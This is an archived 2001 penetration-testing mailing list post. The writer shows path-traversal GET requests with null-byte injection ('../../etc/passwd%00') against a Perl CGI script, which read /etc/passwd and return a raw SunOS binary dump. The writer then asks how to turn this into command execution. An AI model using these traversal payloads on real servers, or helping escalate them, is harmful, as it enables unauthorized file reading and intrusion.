Penetration Testing mailing list archives

Previous By Date Next
Previous By Thread Next

vulnerable perl script?

From: otaner () gmx ch
Date: Thu, 18 Oct 2001 19:07:27 +0200 (MEST)
Hi,

I'm doing a pen test and I found a perl script, which seems to be
vulnerable. If I do a get,
for
example:

GET
/cgi-bin/whatever.pl?variable1=test%00&variable2=../../../../../../etc/passwd%00

I can see the content of the passwd file. But when I try to execute a
command, for example:

GET
/cgi-bin/whatever.pl?variable1=test%00&variable2=../../../../../../bin/id%00

I get this garbage and some interesting stuff:


ELF t4P4
(44

ÔééììvÈDD¨/usr/lib/ld.so.15HF$<#%C!-5AD,E0@2:(G8'4>3?;+B9&)*1/6= ".7Ôèäd 

$ < T t ¼ ô ,
0
°&#338;¸4getopt_startgetpwuid_environ_end_iob_ex_register__flsbuf_GLOBAL_OFFSET_TABLE_geteuidatexitexitgettext_inittextdomainsetgrentgetuidgetpwnam___Argvsetbuf_DYNAMICgetgrentprintf__iobsetlocale_exit_ex_deregisterenvironperror__cg89_usedgetgrgid__cg92_usedgetegid__fnonstd_usedoptindstrcmp_edata_PROCEDURE_LINKAGE_TABLE___fsr_init_valuegetgroups_etext_lib_versiongetgidmain__environ_lock_finifprintfendgrentlibc.so.1SUNW_1.1libc.so.1Á
='&#8216;Ëð2ìp/°:
...
more garbage
....
`¿ÿô&#8364;§@@@º&#8364;2&#8364; ¢`&#8364;¦
ü&#8364;¤&#8364;&#376;āÇàèSUNW_OST_OSCMDaid: invalid user name: "%s"
getgroupsgetgroups
groups=%u(%s)Usage: id [user] id
-a
[user]
%s%u%s%u%s=%u(%s)(%s)D00¿ÿó<0¿ÿðH0¿ÿíT0¿ÿê`0¿ÿçl0¿ÿäx0¿ÿá&#8222;0¿ÿÞ T $P 
ÿþó&#8364;ÿþý8ÿþüÈÿþý8uid euid gid egid@(#)SunOS
5.7
Generic
October
1998.interp.hash.dynsym.dynstr.SUNW_version.rela.ex_shared.rela.bss.rela.plt.text.init.fini.exception_ranges.rodata.rodata1.got.plt.dynamic.ex_shared.data.data1.bss.comment.shstrtabÔÔ
 èèü
ää&#8364;dd&#382;oÿÿþ   - $ 



I'm not sure but I think, the %00 is the problem and without %00, I get no
results. Does anybody know how I can execute my commands? I tried ; and ¦,
but
nothing happened. I'm not able to see the source of the perl file.

any help would be appreciated

otaner


-- 
GMX - Die Kommunikationsplattform im Internet.
http://www.gmx.net


----------------------------------------------------------------------------
This list is provided by the SecurityFocus Security Intelligence Alert (SIA)
Service. For more information on SecurityFocus' SIA service which
automatically alerts you to the latest security vulnerabilities please see:
https://alerts.securityfocus.com/
Previous By Date Next
Previous By Thread Next

Current thread: